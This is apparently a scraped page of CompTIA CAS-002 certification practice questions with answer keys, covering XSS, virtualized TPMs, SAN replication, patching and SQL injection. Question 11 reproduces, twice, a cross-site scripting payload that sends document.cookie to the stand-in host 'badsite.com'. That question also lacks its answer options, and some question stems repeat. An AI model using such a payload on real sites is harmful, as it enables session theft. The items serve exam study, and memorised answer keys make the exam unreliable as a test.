CompTIA CAS-002 Exam Practice Questions (P. 3)
- Full Access (239 questions)
- Six months of Premium Access
- Access to one million comments
- Seamless ChatGPT Integration
- Ability to download PDF files
- Anki Flashcard files for revision
- No Captcha & No AdSense
- Advanced Exam Configuration
Question #11
A security administrator notices the following line in a server's security log:
<input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>') + "';
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?
<input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>') + "';
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?
send
light_mode
delete
Question #12
A popular commercial virtualization platform allows for the creation of virtual hardware. To virtual machines, this virtual hardware is indistinguishable from real hardware. By implementing virtualized TPMs, which of the following trusted system concepts can be implemented?
- ASoftware-based root of trust
- BContinuous chain of trust
- CChain of trust with a hardware root of trust
- DSoftware-based trust anchor with no root of trust
Correct Answer:
C
C
send
light_mode
delete
Question #13
An organization is concerned with potential data loss in the event of a disaster, and created a backup datacenter as a mitigation strategy. The current storage method is a single NAS used by all servers in both datacenters. Which of the following options increases data availability in the event of a datacenter failure?
- AReplicate NAS changes to the tape backups at the other datacenter.
- BEnsure each server has two HBAs connected through two routes to the NAS.
- CEstablish deduplication across diverse storage paths.
- DEstablish a SAN that replicates between datacenters.
Correct Answer:
D
D
send
light_mode
delete
Question #14
An application present on the majority of an organizations 1,000 systems is vulnerable to a buffer overflow attack. Which of the following is the MOST comprehensive way to resolve the issue?
- ADeploy custom HIPS signatures to detect and block the attacks.
- BValidate and deploy the appropriate patch.
- CRun the application in terminal services to reduce the threat landscape.
- DDeploy custom NIPS signatures to detect and block the attacks.
Correct Answer:
B
B
send
light_mode
delete
Question #15
select id, firstname, lastname from authors
User input= firstname= Hack;man -
lastname=Johnson
Which of the following types of attacks is the user attempting?
User input= firstname= Hack;man -
lastname=Johnson
Which of the following types of attacks is the user attempting?
- AXML injection
- BCommand injection
- CCross-site scripting
- DSQL injection
Correct Answer:
D
D
send
light_mode
delete
All Pages